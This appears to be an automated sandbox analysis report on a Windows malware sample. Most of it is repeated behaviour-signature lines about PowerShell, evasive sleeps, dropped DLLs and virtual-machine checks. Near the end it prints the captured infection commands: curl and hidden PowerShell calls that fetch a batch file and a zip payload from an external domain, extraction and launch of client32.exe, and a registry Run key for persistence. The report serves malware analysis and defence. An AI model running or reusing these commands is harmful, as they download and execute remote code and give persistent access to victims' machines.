Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 776 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4889 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4870 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2158 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4033 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\nkakus\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\TCCTL32.DLL Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\tailji\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\gehrga\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\branding.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\kpodja\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\nkakus\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\kpodja\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\katrga\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\nkakus\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\kpodja\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\mirvfa\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\tailji\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\katrga\avcodec-53.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\gehrga\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\katrga\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\mirvfa\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\gehrga\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\tailji\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\kpodja\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\gehrga\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\HTCTL32.DLL Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\mirvfa\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\nkakus\libstdc++-6.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\remcmdstub.exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\tailji\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\mirvfa\itvwd64.sys Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\katrga\avutil-51.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\hw.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6140 Thread sleep count: 4889 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100 Thread sleep count: 4870 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 712 Thread sleep time: -21213755684765971s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4496 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888 Thread sleep count: 2158 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888 Thread sleep count: 4033 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2164 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2336 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: client32.exe, 0000001D.00000002.2017612312.00000000008BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: HTCTL32.DLL.28.dr Binary or memory string: VMware
Source: client32.exe, 00000021.00000003.1890131129.000000000137D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: chromecache_249.2.dr Binary or memory string: KycyLD0Zix2BvaIjRuxI4HfREQu4HG7pHgFsGR0x8e7eyh+jI0boYQzL2cfkjS6qGJ/eymeBr0Z3
Source: HTCTL32.DLL.28.dr Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: avutil-51.dll1.28.dr Binary or memory string: xvmcidct
Source: HTCTL32.DLL.28.dr Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: HTCTL32.DLL.28.dr Binary or memory string: VMWare
Source: avutil-51.dll1.28.dr Binary or memory string: Cbgrargbargb32bgr32le%s%sname nb_components nb_bits%-11s %7d %10dyuv420pyuyv422rgb24bgr24yuv422pyuv444pyuv410pyuv411pgraymonowmonobpal8yuvj420pyuvj422pyuvj444pxvmcmcxvmcidctuyvy422uyyvyy411bgr8bgr4bgr4_bytergb8rgb4rgb4_bytenv12nv21argbabgrgray16begray16leyuv440pyuvj440pyuva420pvdpau_h264vdpau_mpeg1vdpau_mpeg2vdpau_wmv3vdpau_vc1rgb48bergb48lergb565bergb565lergb555bergb555lebgr565bebgr565lebgr555bebgr555levaapi_mocovaapi_idctvaapi_vldyuv420p16leyuv420p16beyuv422p16leyuv422p16beyuv444p16leyuv444p16bevdpau_mpeg4dxva2_vldrgb444lergb444bebgr444lebgr444begray8abgr48bebgr48leyuv420p9beyuv420p9leyuv420p10beyuv420p10leyuv422p10beyuv422p10leyuv444p9beyuv444p9leyuv444p10beyuv444p10lep
Source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.clal*
Source: curl.exe, 00000018.00000003.1577949341.0000000002960000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000022.00000002.1973008502.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000022.00000003.1971676129.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\ProgramData\xss.bat" Press Enter Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781' -OutFile 'C:\Users\user\AppData\Roaming\Program.zip'" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Program.zip', 'C:\Users\user\AppData\Roaming\Directory')" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Directory\client32.exe "C:\Users\user\AppData\Roaming\Directory\client32.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Program_Cs1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Directory\client32.exe" /f Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /k c:\windows\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c:\windows\system32\curl.exe -k -ss -x post "https://www.insideedgepr.com/header.php" -o "c:\programdata\xss.bat" && start /min "" "c:\programdata\xss.bat" press enter
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: Shell_TrayWnd
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: Progman
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
